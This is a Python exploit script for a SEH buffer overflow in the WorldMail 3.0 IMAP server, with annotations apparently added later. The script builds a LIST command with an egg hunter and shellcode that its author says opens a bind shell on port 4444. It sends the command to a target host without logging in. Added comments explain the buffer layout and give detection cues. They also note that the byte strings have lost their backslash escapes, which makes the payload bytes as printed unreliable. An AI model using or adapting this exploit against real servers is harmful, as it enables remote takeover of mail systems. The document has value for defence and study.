
# Title : WorldMail imapd 3.0 SEH overflow (egg hunter)
# Published : 2012-01-12
# Author :


#!/usr/bin/python
import sys
import socket

## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
## Tested on: XP SP3 en-us
## Author: TheXero
## Website: www.thexero.co.uk
## http://www.nullsecurity.net

## Check for parameters
## Exactly two positional arguments are expected (host, port); anything else
## prints the usage line and exits. quit() is the interactive-shell helper;
## sys.exit() is the conventional call in a script, though both stop here.
if len(sys.argv) != 3:
	print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
	quit()

## Assigns the parameters
target = sys.argv[1]       ## host the IMAP session is opened to
port = int(sys.argv[2])    ## int() raises ValueError on a non-numeric port (no handling here)

## Sets up the socket
## Plain IPv4 TCP stream; no TLS/STARTTLS, so the whole request is sent in clear.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

## Sets the variables
## NOTE(review): every string literal below appears to have lost its backslash
## escapes during extraction ("xeb" rather than an escape), so as shown the
## script sends literal ASCII letters rather than the intended byte values.
## Do not treat the byte sequences printed here as reliable IoCs.
char = "}"                 ## one-byte delimiter placed at both ends of the request argument (see the assembly below)
nseh = "xebx06x90x90"      ## value that lands in the next-SEH slot; presumably a short jump plus padding -- verify
seh = "x4ex3bx01x10" ## 10013B4E  |. 59             POP ECX mailcmn.dll
                     ## value written over the SEH handler pointer; per the author's note it is an address inside mailcmn.dll
buffer = 'x90' * 8         ## dead assignment: reassigned unconditionally below before it is ever read
shellcode = ("T00WT00W" ## Bindshell port 4444
## The leading "T00WT00W" is the egg tag the hunter below searches for; the
## payload body that follows is opaque here -- its behaviour is only what the
## author's comment claims, not something this file demonstrates.
"xbdxe8x39x05xa5xdbxdbxd9x74x24xf4x58x29xc9xb1"
"x56x31x68x13x03x68x13x83xc0xecxdbxf0x59x04x92"
"xfbxa1xd4xc5x72x44xe5xd7xe1x0cx57xe8x62x40x5b"
"x83x27x71xe8xe1xefx76x59x4fxd6xb9x5ax61xd6x16"
"x98xe3xaax64xccxc3x93xa6x01x05xd3xdbxe9x57x8c"
"x90x5bx48xb9xe5x67x69x6dx62xd7x11x08xb5xa3xab"
"x13xe6x1bxa7x5cx1ex10xefx7cx1fxf5xf3x41x56x72"
"xc7x32x69x52x19xbax5bx9axf6x85x53x17x06xc1x54"
"xc7x7dx39xa7x7ax86xfaxd5xa0x03x1fx7dx23xb3xfb"
"x7fxe0x22x8fx8cx4dx20xd7x90x50xe5x63xacxd9x08"
"xa4x24x99x2ex60x6cx7ax4ex31xc8x2dx6fx21xb4x92"
"xd5x29x57xc7x6cx70x30x24x43x8bxc0x22xd4xf8xf2"
"xedx4ex97xbex66x49x60xc0x5dx2dxfex3fx5dx4exd6"
"xfbx09x1ex40x2dx31xf5x90xd2xe4x5axc1x7cx56x1b"
"xb1x3cx06xf3xdbxb2x79xe3xe3x18x0cx23x2ax78x5d"
"xc4x4fx7ex70x48xd9x98x18x60x8fx33xb4x42xf4x8b"
"x23xbcxdexa7xfcx2ax56xaex3ax54x67xe4x69xf9xcf"
"x6fxf9x11xd4x8exfex3fx7cxd8xc7xa8xf6xb4x8ax49"
"x06x9dx7cxe9x95x7ax7cx64x86xd4x2bx21x78x2dxb9"
"xdfx23x87xdfx1dxb5xe0x5bxfax06xeex62x8fx33xd4"
"x74x49xbbx50x20x05xeax0ex9exe3x44xe1x48xbax3b"
"xabx1cx3bx70x6cx5ax44x5dx1ax82xf5x08x5bxbdx3a"
"xddx6bxc6x26x7dx93x1dxe3x8dxdex3fx42x06x87xaa"
"xd6x4bx38x01x14x72xbbxa3xe5x81xa3xc6xe0xcex63"
"x3bx99x5fx06x3bx0ex5fx03")

## Calculates the size of junk depending on the shellcode
## Padding is sized so that junk + shellcode is always 769 bytes, i.e. the
## offset at which the SEH record is reached is fixed regardless of payload length.
## If the payload ever exceeded 769 bytes the multiplier would go negative and
## junk would silently become "", shifting everything that follows.
junk = "x41" * (769 - len(shellcode))

## Egg Hunter
## Small search stub; the "x54x30x30x57" run in the second line is the ASCII
## tag "T00W" that prefixes the shellcode above, so the two are tied together.
hunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05"
"x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7")

## Assembles the buffer
## Layout on the wire: delimiter | padding | shellcode | nSEH | SEH | hunter | delimiter.
## With the intended byte values this is roughly 800 bytes of argument.
buffer = char + junk + shellcode + nseh + seh + hunter + char

## Connects
s.connect((target,port))
data=s.recv(1024)          ## server greeting is read (up to 1024 bytes) and discarded; `data` is never used
## One IMAP LIST command is sent straight after the greeting, with no LOGIN
## beforehand, then the connection is dropped. From a detection standpoint the
## observable pattern is an unauthenticated LIST whose argument is several
## hundred bytes long, far outside what a mailbox pattern would be.
## The trailing "rn" is presumably meant to be the CRLF line terminator
## (see the extraction note above).
s.send("a001 LIST " + buffer + "rn")
s.close()